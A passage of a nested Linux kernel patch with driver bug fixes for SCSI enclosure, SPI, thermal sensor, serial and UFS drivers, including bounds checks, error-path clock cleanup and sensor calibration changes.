++			     type_ptr[0] == ENCLOSURE_COMPONENT_CONTROLLER_ELECTRONICS)) {
+ 				addl_desc_ptr += addl_desc_ptr[1] + 2;
+-
++				if (addl_desc_ptr + 1 >= ses_dev->page10 + ses_dev->page10_len)
++					addl_desc_ptr = NULL;
++			}
+ 		}
+ 	}
+ 	kfree(buf);
+@@ -704,6 +727,12 @@ static int ses_intf_add(struct device *cdev,
+ 		    type_ptr[0] == ENCLOSURE_COMPONENT_ARRAY_DEVICE)
+ 			components += type_ptr[1];
+ 	}
++
++	if (components == 0) {
++		sdev_printk(KERN_WARNING, sdev, "enclosure has no enumerated components\n");
++		goto err_free;
++	}
++
+ 	ses_dev->page1 = buf;
+ 	ses_dev->page1_len = len;
+ 	buf = NULL;
+@@ -827,7 +856,8 @@ static void ses_intf_remove_enclosure(struct scsi_device *sdev)
+ 	kfree(ses_dev->page2);
+ 	kfree(ses_dev);
+ 
+-	kfree(edev->component[0].scratch);
++	if (edev->components)
++		kfree(edev->component[0].scratch);
+ 
+ 	put_device(&edev->edev);
+ 	enclosure_unregister(edev);
+diff --git a/drivers/scsi/snic/snic_debugfs.c b/drivers/scsi/snic/snic_debugfs.c
+index 57bdc3ba49d9c..9dd975b36b5bd 100644
+--- a/drivers/scsi/snic/snic_debugfs.c
++++ b/drivers/scsi/snic/snic_debugfs.c
+@@ -437,6 +437,6 @@ void snic_trc_debugfs_init(void)
+ void
+ snic_trc_debugfs_term(void)
+ {
+-	debugfs_remove(debugfs_lookup(TRC_FILE, snic_glob->trc_root));
+-	debugfs_remove(debugfs_lookup(TRC_ENABLE_FILE, snic_glob->trc_root));
++	debugfs_lookup_and_remove(TRC_FILE, snic_glob->trc_root);
++	debugfs_lookup_and_remove(TRC_ENABLE_FILE, snic_glob->trc_root);
+ }
+diff --git a/drivers/soundwire/cadence_master.c b/drivers/soundwire/cadence_master.c
+index a1de363eba3ff..27699f341f2c5 100644
+--- a/drivers/soundwire/cadence_master.c
++++ b/drivers/soundwire/cadence_master.c
+@@ -127,7 +127,8 @@ MODULE_PARM_DESC(cdns_mcp_int_mask, "Cadence MCP IntMask");
+ 
+ #define CDNS_MCP_CMD_BASE			0x80
+ #define CDNS_MCP_RESP_BASE			0x80
+-#define CDNS_MCP_CMD_LEN			0x20
++/* FIFO can hold 8 commands */
++#define CDNS_MCP_CMD_LEN			8
+ #define CDNS_MCP_CMD_WORD_LEN			0x4
+ 
+ #define CDNS_MCP_CMD_SSP_TAG			BIT(31)
+diff --git a/drivers/spi/Kconfig b/drivers/spi/Kconfig
+index 3b1c0878bb857..930c6075b78cf 100644
+--- a/drivers/spi/Kconfig
++++ b/drivers/spi/Kconfig
+@@ -295,7 +295,6 @@ config SPI_DW_BT1
+ 	tristate "Baikal-T1 SPI driver for DW SPI core"
+ 	depends on MIPS_BAIKAL_T1 || COMPILE_TEST
+ 	select MULTIPLEXER
+-	select MUX_MMIO
+ 	help
+ 	  Baikal-T1 SoC is equipped with three DW APB SSI-based MMIO SPI
+ 	  controllers. Two of them are pretty much normal: with IRQ, DMA,
+diff --git a/drivers/spi/spi-bcm63xx-hsspi.c b/drivers/spi/spi-bcm63xx-hsspi.c
+index b871fd810d801..02f56fc001b47 100644
+--- a/drivers/spi/spi-bcm63xx-hsspi.c
++++ b/drivers/spi/spi-bcm63xx-hsspi.c
+@@ -163,6 +163,7 @@ static int bcm63xx_hsspi_do_txrx(struct spi_device *spi, struct spi_transfer *t)
+ 	int step_size = HSSPI_BUFFER_LEN;
+ 	const u8 *tx = t->tx_buf;
+ 	u8 *rx = t->rx_buf;
++	u32 val = 0;
+ 
+ 	bcm63xx_hsspi_set_clk(bs, spi, t->speed_hz);
+ 	bcm63xx_hsspi_set_cs(bs, spi->chip_select, true);
+@@ -178,11 +179,16 @@ static int bcm63xx_hsspi_do_txrx(struct spi_device *spi, struct spi_transfer *t)
+ 		step_size -= HSSPI_OPCODE_LEN;
+ 
+ 	if ((opcode == HSSPI_OP_READ && t->rx_nbits == SPI_NBITS_DUAL) ||
+-	    (opcode == HSSPI_OP_WRITE && t->tx_nbits == SPI_NBITS_DUAL))
++	    (opcode == HSSPI_OP_WRITE && t->tx_nbits == SPI_NBITS_DUAL)) {
+ 		opcode |= HSSPI_OP_MULTIBIT;
+ 
+-	__raw_writel(1 << MODE_CTRL_MULTIDATA_WR_SIZE_SHIFT |
+-		     1 << MODE_CTRL_MULTIDATA_RD_SIZE_SHIFT | 0xff,
++		if (t->rx_nbits == SPI_NBITS_DUAL)
++			val |= 1 << MODE_CTRL_MULTIDATA_RD_SIZE_SHIFT;
++		if (t->tx_nbits == SPI_NBITS_DUAL)
++			val |= 1 << MODE_CTRL_MULTIDATA_WR_SIZE_SHIFT;
++	}
++
++	__raw_writel(val | 0xff,
+ 		     bs->regs + HSSPI_PROFILE_MODE_CTRL_REG(chip_select));
+ 
+ 	while (pending > 0) {
+diff --git a/drivers/spi/spi-intel.c b/drivers/spi/spi-intel.c
+index f619212b0d5c3..627287925fedb 100644
+--- a/drivers/spi/spi-intel.c
++++ b/drivers/spi/spi-intel.c
+@@ -1368,14 +1368,14 @@ static int intel_spi_populate_chip(struct intel_spi *ispi)
+ 	if (!spi_new_device(ispi->master, &chip))
+ 		return -ENODEV;
+ 
+-	/* Add the second chip if present */
+-	if (ispi->master->num_chipselect < 2)
+-		return 0;
+-
+ 	ret = intel_spi_read_desc(ispi);
+ 	if (ret)
+ 		return ret;
+ 
++	/* Add the second chip if present */
++	if (ispi->master->num_chipselect < 2)
++		return 0;
++
+ 	chip.platform_data = NULL;
+ 	chip.chip_select = 1;
+ 
+diff --git a/drivers/spi/spi-sn-f-ospi.c b/drivers/spi/spi-sn-f-ospi.c
+index 348c6e1edd38a..333b22dfd8dba 100644
+--- a/drivers/spi/spi-sn-f-ospi.c
++++ b/drivers/spi/spi-sn-f-ospi.c
+@@ -611,7 +611,7 @@ static int f_ospi_probe(struct platform_device *pdev)
+ 		return -ENOMEM;
+ 
+ 	ctlr->mode_bits = SPI_TX_DUAL | SPI_TX_QUAD | SPI_TX_OCTAL
+-		| SPI_RX_DUAL | SPI_RX_QUAD | SPI_TX_OCTAL
++		| SPI_RX_DUAL | SPI_RX_QUAD | SPI_RX_OCTAL
+ 		| SPI_MODE_0 | SPI_MODE_1 | SPI_LSB_FIRST;
+ 	ctlr->mem_ops = &f_ospi_mem_ops;
+ 	ctlr->bus_num = -1;
+diff --git a/drivers/spi/spi-synquacer.c b/drivers/spi/spi-synquacer.c
+index 47cbe73137c23..dc188f9202c97 100644
+--- a/drivers/spi/spi-synquacer.c
++++ b/drivers/spi/spi-synquacer.c
+@@ -472,10 +472,9 @@ static int synquacer_spi_transfer_one(struct spi_master *master,
+ 		read_fifo(sspi);
+ 	}
+ 
+-	if (status < 0) {
+-		dev_err(sspi->dev, "failed to transfer. status: 0x%x\n",
+-			status);
+-		return status;
++	if (status == 0) {
++		dev_err(sspi->dev, "failed to transfer. Timeout.\n");
++		return -ETIMEDOUT;
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/staging/media/atomisp/Kconfig b/drivers/staging/media/atomisp/Kconfig
+index 2c8d7fdcc5f7a..c9bff98e5309a 100644
+--- a/drivers/staging/media/atomisp/Kconfig
++++ b/drivers/staging/media/atomisp/Kconfig
+@@ -14,7 +14,7 @@ config VIDEO_ATOMISP
+ 	depends on VIDEO_DEV && INTEL_ATOMISP
+ 	depends on PMIC_OPREGION
+ 	select IOSF_MBI
+-	select VIDEOBUF_VMALLOC
++	select VIDEOBUF2_VMALLOC
+ 	select VIDEO_V4L2_SUBDEV_API
+ 	help
+ 	  Say Y here if your platform supports Intel Atom SoC
+diff --git a/drivers/staging/media/atomisp/pci/atomisp_fops.c b/drivers/staging/media/atomisp/pci/atomisp_fops.c
+index acea7492847d8..9b9d50d7166a0 100644
+--- a/drivers/staging/media/atomisp/pci/atomisp_fops.c
++++ b/drivers/staging/media/atomisp/pci/atomisp_fops.c
+@@ -821,13 +821,13 @@ init_subdev:
+ 		goto done;
+ 
+ 	atomisp_subdev_init_struct(asd);
++	/* Ensure that a mode is set */
++	v4l2_ctrl_s_ctrl(asd->run_mode, pipe->default_run_mode);
+ 
+ done:
+ 	pipe->users++;
+ 	mutex_unlock(&isp->mutex);
+ 
+-	/* Ensure that a mode is set */
+-	v4l2_ctrl_s_ctrl(asd->run_mode, pipe->default_run_mode);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/thermal/hisi_thermal.c b/drivers/thermal/hisi_thermal.c
+index d6974db7aaf76..15af90f5c7d91 100644
+--- a/drivers/thermal/hisi_thermal.c
++++ b/drivers/thermal/hisi_thermal.c
+@@ -427,10 +427,6 @@ static int hi3660_thermal_probe(struct hisi_thermal_data *data)
+ 	data->sensor[0].irq_name = "tsensor_a73";
+ 	data->sensor[0].data = data;
+ 
+-	data->sensor[1].id = HI3660_LITTLE_SENSOR;
+-	data->sensor[1].irq_name = "tsensor_a53";
+-	data->sensor[1].data = data;
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/thermal/imx_sc_thermal.c b/drivers/thermal/imx_sc_thermal.c
+index 4df925e3a80bd..dfadb03580ae1 100644
+--- a/drivers/thermal/imx_sc_thermal.c
++++ b/drivers/thermal/imx_sc_thermal.c
+@@ -88,7 +88,7 @@ static int imx_sc_thermal_probe(struct platform_device *pdev)
+ 	if (!resource_id)
+ 		return -EINVAL;
+ 
+-	for (i = 0; resource_id[i] > 0; i++) {
++	for (i = 0; resource_id[i] >= 0; i++) {
+ 
+ 		sensor = devm_kzalloc(&pdev->dev, sizeof(*sensor), GFP_KERNEL);
+ 		if (!sensor)
+@@ -127,7 +127,7 @@ static int imx_sc_thermal_probe(struct platform_device *pdev)
+ 	return 0;
+ }
+ 
+-static int imx_sc_sensors[] = { IMX_SC_R_SYSTEM, IMX_SC_R_PMIC_0, -1 };
++static const int imx_sc_sensors[] = { IMX_SC_R_SYSTEM, IMX_SC_R_PMIC_0, -1 };
+ 
+ static const struct of_device_id imx_sc_thermal_table[] = {
+ 	{ .compatible = "fsl,imx-sc-thermal", .data =  imx_sc_sensors },
+diff --git a/drivers/thermal/intel/intel_pch_thermal.c b/drivers/thermal/intel/intel_pch_thermal.c
+index dabf11a687a15..9e27f430e0345 100644
+--- a/drivers/thermal/intel/intel_pch_thermal.c
++++ b/drivers/thermal/intel/intel_pch_thermal.c
+@@ -29,6 +29,7 @@
+ #define PCH_THERMAL_DID_CNL_LP	0x02F9 /* CNL-LP PCH */
+ #define PCH_THERMAL_DID_CML_H	0X06F9 /* CML-H PCH */
+ #define PCH_THERMAL_DID_LWB	0xA1B1 /* Lewisburg PCH */
++#define PCH_THERMAL_DID_WBG	0x8D24 /* Wellsburg PCH */
+ 
+ /* Wildcat Point-LP  PCH Thermal registers */
+ #define WPT_TEMP	0x0000	/* Temperature */
+@@ -350,6 +351,7 @@ enum board_ids {
+ 	board_cnl,
+ 	board_cml,
+ 	board_lwb,
++	board_wbg,
+ };
+ 
+ static const struct board_info {
+@@ -380,6 +382,10 @@ static const struct board_info {
+ 		.name = "pch_lewisburg",
+ 		.ops = &pch_dev_ops_wpt,
+ 	},
++	[board_wbg] = {
++		.name = "pch_wellsburg",
++		.ops = &pch_dev_ops_wpt,
++	},
+ };
+ 
+ static int intel_pch_thermal_probe(struct pci_dev *pdev,
+@@ -495,6 +501,8 @@ static const struct pci_device_id intel_pch_thermal_id[] = {
+ 		.driver_data = board_cml, },
+ 	{ PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCH_THERMAL_DID_LWB),
+ 		.driver_data = board_lwb, },
++	{ PCI_DEVICE(PCI_VENDOR_ID_INTEL, PCH_THERMAL_DID_WBG),
++		.driver_data = board_wbg, },
+ 	{ 0, },
+ };
+ MODULE_DEVICE_TABLE(pci, intel_pch_thermal_id);
+diff --git a/drivers/thermal/intel/intel_powerclamp.c b/drivers/thermal/intel/intel_powerclamp.c
+index b80e25ec12615..2f4cbfdf26a00 100644
+--- a/drivers/thermal/intel/intel_powerclamp.c
++++ b/drivers/thermal/intel/intel_powerclamp.c
+@@ -57,6 +57,7 @@
+ 
+ static unsigned int target_mwait;
+ static struct dentry *debug_dir;
++static bool poll_pkg_cstate_enable;
+ 
+ /* user selected target */
+ static unsigned int set_target_ratio;
+@@ -261,6 +262,9 @@ static unsigned int get_compensation(int ratio)
+ {
+ 	unsigned int comp = 0;
+ 
++	if (!poll_pkg_cstate_enable)
++		return 0;
++
+ 	/* we only use compensation if all adjacent ones are good */
+ 	if (ratio == 1 &&
+ 		cal_data[ratio].confidence >= CONFIDENCE_OK &&
+@@ -519,7 +523,8 @@ static int start_power_clamp(void)
+ 	control_cpu = cpumask_first(cpu_online_mask);
+ 
+ 	clamping = true;
+-	schedule_delayed_work(&poll_pkg_cstate_work, 0);
++	if (poll_pkg_cstate_enable)
++		schedule_delayed_work(&poll_pkg_cstate_work, 0);
+ 
+ 	/* start one kthread worker per online cpu */
+ 	for_each_online_cpu(cpu) {
+@@ -585,11 +590,15 @@ static int powerclamp_get_max_state(struct thermal_cooling_device *cdev,
+ static int powerclamp_get_cur_state(struct thermal_cooling_device *cdev,
+ 				 unsigned long *state)
+ {
+-	if (true == clamping)
+-		*state = pkg_cstate_ratio_cur;
+-	else
++	if (clamping) {
++		if (poll_pkg_cstate_enable)
++			*state = pkg_cstate_ratio_cur;
++		else
++			*state = set_target_ratio;
++	} else {
+ 		/* to save power, do not poll idle ratio while not clamping */
+ 		*state = -1; /* indicates invalid state */
++	}
+ 
+ 	return 0;
+ }
+@@ -712,6 +721,9 @@ static int __init powerclamp_init(void)
+ 		goto exit_unregister;
+ 	}
+ 
++	if (topology_max_packages() == 1 && topology_max_die_per_package() == 1)
++		poll_pkg_cstate_enable = true;
++
+ 	cooling_dev = thermal_cooling_device_register("intel_powerclamp", NULL,
+ 						&powerclamp_cooling_ops);
+ 	if (IS_ERR(cooling_dev)) {
+diff --git a/drivers/thermal/intel/intel_soc_dts_iosf.c b/drivers/thermal/intel/intel_soc_dts_iosf.c
+index 342b0bb5a56d9..8651ff1abe754 100644
+--- a/drivers/thermal/intel/intel_soc_dts_iosf.c
++++ b/drivers/thermal/intel/intel_soc_dts_iosf.c
+@@ -405,7 +405,7 @@ struct intel_soc_dts_sensors *intel_soc_dts_iosf_init(
+ {
+ 	struct intel_soc_dts_sensors *sensors;
+ 	bool notification;
+-	u32 tj_max;
++	int tj_max;
+ 	int ret;
+ 	int i;
+ 
+diff --git a/drivers/thermal/qcom/tsens-v0_1.c b/drivers/thermal/qcom/tsens-v0_1.c
+index 04d012e4f7288..3158f13c54305 100644
+--- a/drivers/thermal/qcom/tsens-v0_1.c
++++ b/drivers/thermal/qcom/tsens-v0_1.c
+@@ -285,7 +285,7 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 	u32 p1[10], p2[10];
+ 	int mode = 0;
+ 	u32 *qfprom_cdata;
+-	u32 cdata[6];
++	u32 cdata[4];
+ 
+ 	qfprom_cdata = (u32 *)qfprom_read(priv->dev, "calib");
+ 	if (IS_ERR(qfprom_cdata))
+@@ -296,8 +296,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 	cdata[1] = qfprom_cdata[13];
+ 	cdata[2] = qfprom_cdata[0];
+ 	cdata[3] = qfprom_cdata[1];
+-	cdata[4] = qfprom_cdata[22];
+-	cdata[5] = qfprom_cdata[21];
+ 
+ 	mode = (cdata[0] & MSM8939_CAL_SEL_MASK) >> MSM8939_CAL_SEL_SHIFT;
+ 	dev_dbg(priv->dev, "calibration mode is %d\n", mode);
+@@ -314,8 +312,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 		p2[6] = (cdata[2] & MSM8939_S6_P2_MASK) >> MSM8939_S6_P2_SHIFT;
+ 		p2[7] = (cdata[3] & MSM8939_S7_P2_MASK) >> MSM8939_S7_P2_SHIFT;
+ 		p2[8] = (cdata[3] & MSM8939_S8_P2_MASK) >> MSM8939_S8_P2_SHIFT;
+-		p2[9] = (cdata[4] & MSM8939_S9_P2_MASK_0_4) >> MSM8939_S9_P2_SHIFT_0_4;
+-		p2[9] |= ((cdata[5] & MSM8939_S9_P2_MASK_5) >> MSM8939_S9_P2_SHIFT_5) << 5;
+ 		for (i = 0; i < priv->num_sensors; i++)
+ 			p2[i] = (base1 + p2[i]) << 2;
+ 		fallthrough;
+@@ -331,7 +327,6 @@ static int calibrate_8939(struct tsens_priv *priv)
+ 		p1[6] = (cdata[2] & MSM8939_S6_P1_MASK) >> MSM8939_S6_P1_SHIFT;
+ 		p1[7] = (cdata[3] & MSM8939_S7_P1_MASK) >> MSM8939_S7_P1_SHIFT;
+ 		p1[8] = (cdata[3] & MSM8939_S8_P1_MASK) >> MSM8939_S8_P1_SHIFT;
+-		p1[9] = (cdata[4] & MSM8939_S9_P1_MASK) >> MSM8939_S9_P1_SHIFT;
+ 		for (i = 0; i < priv->num_sensors; i++)
+ 			p1[i] = ((base0) + p1[i]) << 2;
+ 		break;
+@@ -534,6 +529,21 @@ static int calibrate_9607(struct tsens_priv *priv)
+ 	return 0;
+ }
+ 
++static int __init init_8939(struct tsens_priv *priv) {
++	priv->sensor[0].slope = 2911;
++	priv->sensor[1].slope = 2789;
++	priv->sensor[2].slope = 2906;
++	priv->sensor[3].slope = 2763;
++	priv->sensor[4].slope = 2922;
++	priv->sensor[5].slope = 2867;
++	priv->sensor[6].slope = 2833;
++	priv->sensor[7].slope = 2838;
++	priv->sensor[8].slope = 2840;
++	/* priv->sensor[9].slope = 2852; */
++
++	return init_common(priv);
++}
++
+ /* v0.1: 8916, 8939, 8974, 9607 */
+ 
+ static struct tsens_features tsens_v0_1_feat = {
+@@ -599,15 +609,15 @@ struct tsens_plat_data data_8916 = {
+ };
+ 
+ static const struct tsens_ops ops_8939 = {
+-	.init		= init_common,
++	.init		= init_8939,
+ 	.calibrate	= calibrate_8939,
+ 	.get_temp	= get_temp_common,
+ };
+ 
+ struct tsens_plat_data data_8939 = {
+-	.num_sensors	= 10,
++	.num_sensors	= 9,
+ 	.ops		= &ops_8939,
+-	.hw_ids		= (unsigned int []){ 0, 1, 2, 3, 5, 6, 7, 8, 9, 10 },
++	.hw_ids		= (unsigned int []){ 0, 1, 2, 3, 5, 6, 7, 8, 9, /* 10 */ },
+ 
+ 	.feat		= &tsens_v0_1_feat,
+ 	.fields	= tsens_v0_1_regfields,
+diff --git a/drivers/thermal/qcom/tsens-v1.c b/drivers/thermal/qcom/tsens-v1.c
+index 1d7f8a80bd13a..9c443a2fb32ca 100644
+--- a/drivers/thermal/qcom/tsens-v1.c
++++ b/drivers/thermal/qcom/tsens-v1.c
+@@ -78,11 +78,6 @@
+ 
+ #define MSM8976_CAL_SEL_MASK	0x3
+ 
+-#define MSM8976_CAL_DEGC_PT1	30
+-#define MSM8976_CAL_DEGC_PT2	120
+-#define MSM8976_SLOPE_FACTOR	1000
+-#define MSM8976_SLOPE_DEFAULT	3200
+-
+ /* eeprom layout data for qcs404/405 (v1) */
+ #define BASE0_MASK	0x000007f8
+ #define BASE1_MASK	0x0007f800
+@@ -142,30 +137,6 @@
+ #define CAL_SEL_MASK	7
+ #define CAL_SEL_SHIFT	0
+ 
+-static void compute_intercept_slope_8976(struct tsens_priv *priv,
+-			      u32 *p1, u32 *p2, u32 mode)
+-{
+-	int i;
+-
+-	priv->sensor[0].slope = 3313;
+-	priv->sensor[1].slope = 3275;
+-	priv->sensor[2].slope = 3320;
+-	priv->sensor[3].slope = 3246;
+-	priv->sensor[4].slope = 3279;
+-	priv->sensor[5].slope = 3257;
+-	priv->sensor[6].slope = 3234;
+-	priv->sensor[7].slope = 3269;
+-	priv->sensor[8].slope = 3255;
+-	priv->sensor[9].slope = 3239;
+-	priv->sensor[10].slope = 3286;
+-
+-	for (i = 0; i < priv->num_sensors; i++) {
+-		priv->sensor[i].offset = (p1[i] * MSM8976_SLOPE_FACTOR) -
+-				(MSM8976_CAL_DEGC_PT1 *
+-				priv->sensor[i].slope);
+-	}
+-}
+-
+ static int calibrate_v1(struct tsens_priv *priv)
+ {
+ 	u32 base0 = 0, base1 = 0;
+@@ -291,7 +262,7 @@ static int calibrate_8976(struct tsens_priv *priv)
+ 		break;
+ 	}
+ 
+-	compute_intercept_slope_8976(priv, p1, p2, mode);
++	compute_intercept_slope(priv, p1, p2, mode);
+ 	kfree(qfprom_cdata);
+ 
+ 	return 0;
+@@ -365,6 +336,22 @@ static const struct reg_field tsens_v1_regfields[MAX_REGFIELDS] = {
+ 	[TRDY] = REG_FIELD(TM_TRDY_OFF, 0, 0),
+ };
+ 
++static int __init init_8956(struct tsens_priv *priv) {
++	priv->sensor[0].slope = 3313;
++	priv->sensor[1].slope = 3275;
++	priv->sensor[2].slope = 3320;
++	priv->sensor[3].slope = 3246;
++	priv->sensor[4].slope = 3279;
++	priv->sensor[5].slope = 3257;
++	priv->sensor[6].slope = 3234;
++	priv->sensor[7].slope = 3269;
++	priv->sensor[8].slope = 3255;
++	priv->sensor[9].slope = 3239;
++	priv->sensor[10].slope = 3286;
++
++	return init_common(priv);
++}
++
+ static const struct tsens_ops ops_generic_v1 = {
+ 	.init		= init_common,
+ 	.calibrate	= calibrate_v1,
+@@ -377,13 +364,25 @@ struct tsens_plat_data data_tsens_v1 = {
+ 	.fields	= tsens_v1_regfields,
+ };
+ 
++static const struct tsens_ops ops_8956 = {
++	.init		= init_8956,
++	.calibrate	= calibrate_8976,
++	.get_temp	= get_temp_tsens_valid,
++};
++
++struct tsens_plat_data data_8956 = {
++	.num_sensors	= 11,
++	.ops		= &ops_8956,
++	.feat		= &tsens_v1_feat,
++	.fields		= tsens_v1_regfields,
++};
++
+ static const struct tsens_ops ops_8976 = {
+ 	.init		= init_common,
+ 	.calibrate	= calibrate_8976,
+ 	.get_temp	= get_temp_tsens_valid,
+ };
+ 
+-/* Valid for both MSM8956 and MSM8976. */
+ struct tsens_plat_data data_8976 = {
+ 	.num_sensors	= 11,
+ 	.ops		= &ops_8976,
+diff --git a/drivers/thermal/qcom/tsens.c b/drivers/thermal/qcom/tsens.c
+index b5b136ff323f9..b191e19df93dc 100644
+--- a/drivers/thermal/qcom/tsens.c
++++ b/drivers/thermal/qcom/tsens.c
+@@ -983,6 +983,9 @@ static const struct of_device_id tsens_table[] = {
+ 	}, {
+ 		.compatible = "qcom,msm8939-tsens",
+ 		.data = &data_8939,
++	}, {
++		.compatible = "qcom,msm8956-tsens",
++		.data = &data_8956,
+ 	}, {
+ 		.compatible = "qcom,msm8960-tsens",
+ 		.data = &data_8960,
+diff --git a/drivers/thermal/qcom/tsens.h b/drivers/thermal/qcom/tsens.h
+index 899af128855f7..7dd5fc2468945 100644
+--- a/drivers/thermal/qcom/tsens.h
++++ b/drivers/thermal/qcom/tsens.h
+@@ -594,7 +594,7 @@ extern struct tsens_plat_data data_8960;
+ extern struct tsens_plat_data data_8916, data_8939, data_8974, data_9607;
+ 
+ /* TSENS v1 targets */
+-extern struct tsens_plat_data data_tsens_v1, data_8976;
++extern struct tsens_plat_data data_tsens_v1, data_8976, data_8956;
+ 
+ /* TSENS v2 targets */
+ extern struct tsens_plat_data data_8996, data_ipq8074, data_tsens_v2;
+diff --git a/drivers/tty/serial/fsl_lpuart.c b/drivers/tty/serial/fsl_lpuart.c
+index 5e69fb73f570f..23910ac724b11 100644
+--- a/drivers/tty/serial/fsl_lpuart.c
++++ b/drivers/tty/serial/fsl_lpuart.c
+@@ -1387,9 +1387,9 @@ static int lpuart32_config_rs485(struct uart_port *port, struct ktermios *termio
+ 		 * Note: UART is assumed to be active high.
+ 		 */
+ 		if (rs485->flags & SER_RS485_RTS_ON_SEND)
+-			modem &= ~UARTMODEM_TXRTSPOL;
+-		else if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
+ 			modem |= UARTMODEM_TXRTSPOL;
++		else if (rs485->flags & SER_RS485_RTS_AFTER_SEND)
++			modem &= ~UARTMODEM_TXRTSPOL;
+ 	}
+ 
+ 	lpuart32_write(&sport->port, modem, UARTMODIR);
+@@ -1683,12 +1683,6 @@ static void lpuart32_configure(struct lpuart_port *sport)
+ {
+ 	unsigned long temp;
+ 
+-	if (sport->lpuart_dma_rx_use) {
+-		/* RXWATER must be 0 */
+-		temp = lpuart32_read(&sport->port, UARTWATER);
+-		temp &= ~(UARTWATER_WATER_MASK << UARTWATER_RXWATER_OFF);
+-		lpuart32_write(&sport->port, temp, UARTWATER);
+-	}
+ 	temp = lpuart32_read(&sport->port, UARTCTRL);
+ 	if (!sport->lpuart_dma_rx_use)
+ 		temp |= UARTCTRL_RIE;
+@@ -1796,6 +1790,15 @@ static void lpuart32_shutdown(struct uart_port *port)
+ 
+ 	spin_lock_irqsave(&port->lock, flags);
+ 
++	/* clear status */
++	temp = lpuart32_read(&sport->port, UARTSTAT);
++	lpuart32_write(&sport->port, temp, UARTSTAT);
++
++	/* disable Rx/Tx DMA */
++	temp = lpuart32_read(port, UARTBAUD);
++	temp &= ~(UARTBAUD_TDMAE | UARTBAUD_RDMAE);
++	lpuart32_write(port, temp, UARTBAUD);
++
+ 	/* disable Rx/Tx and interrupts */
+ 	temp = lpuart32_read(port, UARTCTRL);
+ 	temp &= ~(UARTCTRL_TE | UARTCTRL_RE |
+diff --git a/drivers/tty/serial/imx.c b/drivers/tty/serial/imx.c
+index 757825edb0cd9..5f35343f81309 100644
+--- a/drivers/tty/serial/imx.c
++++ b/drivers/tty/serial/imx.c
+@@ -2374,6 +2374,11 @@ static int imx_uart_probe(struct platform_device *pdev)
+ 	ucr1 &= ~(UCR1_ADEN | UCR1_TRDYEN | UCR1_IDEN | UCR1_RRDYEN | UCR1_RTSDEN);
+ 	imx_uart_writel(sport, ucr1, UCR1);
+ 
++	/* Disable Ageing Timer interrupt */
++	ucr2 = imx_uart_readl(sport, UCR2);
++	ucr2 &= ~UCR2_ATEN;
++	imx_uart_writel(sport, ucr2, UCR2);
++
+ 	/*
+ 	 * In case RS485 is enabled without GPIO RTS control, the UART IP
+ 	 * is used to control CTS signal. Keep both the UART and Receiver
+diff --git a/drivers/tty/serial/serial-tegra.c b/drivers/tty/serial/serial-tegra.c
+index e5b9773db5e36..1cf08b33456c9 100644
+--- a/drivers/tty/serial/serial-tegra.c
++++ b/drivers/tty/serial/serial-tegra.c
+@@ -1046,6 +1046,7 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	if (tup->cdata->fifo_mode_enable_status) {
+ 		ret = tegra_uart_wait_fifo_mode_enabled(tup);
+ 		if (ret < 0) {
++			clk_disable_unprepare(tup->uart_clk);
+ 			dev_err(tup->uport.dev,
+ 				"Failed to enable FIFO mode: %d\n", ret);
+ 			return ret;
+@@ -1067,6 +1068,7 @@ static int tegra_uart_hw_init(struct tegra_uart_port *tup)
+ 	 */
+ 	ret = tegra_set_baudrate(tup, TEGRA_UART_DEFAULT_BAUD);
+ 	if (ret < 0) {
++		clk_disable_unprepare(tup->uart_clk);
+ 		dev_err(tup->uport.dev, "Failed to set baud rate\n");
+ 		return ret;
+ 	}
+@@ -1226,10 +1228,13 @@ static int tegra_uart_startup(struct uart_port *u)
+ 				dev_name(u->dev), tup);
+ 	if (ret < 0) {
+ 		dev_err(u->dev, "Failed to register ISR for IRQ %d\n", u->irq);
+-		goto fail_hw_init;
++		goto fail_request_irq;
+ 	}
+ 	return 0;
+ 
++fail_request_irq:
++	/* tup->uart_clk is already enabled in tegra_uart_hw_init */
++	clk_disable_unprepare(tup->uart_clk);
+ fail_hw_init:
+ 	if (!tup->use_rx_pio)
+ 		tegra_uart_dma_channel_free(tup, true);
+diff --git a/drivers/ufs/core/ufshcd.c b/drivers/ufs/core/ufshcd.c
+index 3a1c4d31e010d..2ddc1aba0ad75 100644
+--- a/drivers/ufs/core/ufshcd.c
++++ b/drivers/ufs/core/ufshcd.c
+@@ -3008,6 +3008,22 @@ retry:
+ 		} else {
+ 			dev_err(hba->dev, "%s: failed to clear tag %d\n",
+ 				__func__, lrbp->task_tag);
++
++			spin_lock_irqsave(&hba->outstanding_lock, flags);
++			pending = test_bit(lrbp->task_tag,
++					   &hba->outstanding_reqs);
++			if (pending)
++				hba->dev_cmd.complete = NULL;
++			spin_unlock_irqrestore(&hba->outstanding_lock, flags);
++
++			if (!pending) {
++				/*
++				 * The completion handler ran while we tried to
++				 * clear the command.
++				 */
++				time_left = 1;
++				goto retry;
++			}
+ 		}
+ 	}
+ 
+@@ -5030,8 +5046,8 @@ static int ufshcd_slave_configure(struct scsi_device *sdev)
+ 	ufshcd_hpb_configure(hba, sdev);
+ 
+ 	blk_queue_update_dma_pad(q, PRDT_DATA_BYTE_COUNT_PAD - 1);
+-	if (hba->quirks & UFSHCD_QUIRK_ALIGN_SG_WITH_PAGE_SIZE)
+-		blk_queue_update_dma_alignment(q, PAGE_SIZE - 1);
++	if (hba->quirks & UFSHCD_QUIRK_4KB_DMA_ALIGNMENT)
++		blk_queue_update_dma_alignment(q, 4096 - 1);
+ 	/*
+ 	 * Block runtime-pm until all consumers are added.
+ 	 * Refer ufshcd_setup_links().
+diff --git a/drivers/ufs/host/ufs-exynos.c b/drivers/ufs/host/ufs-exynos.c
+index c3628a8645a56..3cdac89a28b81 100644
+--- a/drivers/ufs/host/ufs-exynos.c
++++ b/drivers/ufs/host/ufs-exynos.c
+@@ -1673,7 +1673,7 @@ static const struct exynos_ufs_drv_data exynos_ufs_drvs = {
+ 				  UFSHCD_QUIRK_BROKEN_OCS_FATAL_ERROR |
+ 				  UFSHCI_QUIRK_SKIP_MANUAL_WB_FLUSH_CTRL |
+ 				  UFSHCD_QUIRK_SKIP_DEF_UNIPRO_TIMEOUT_SETTING |
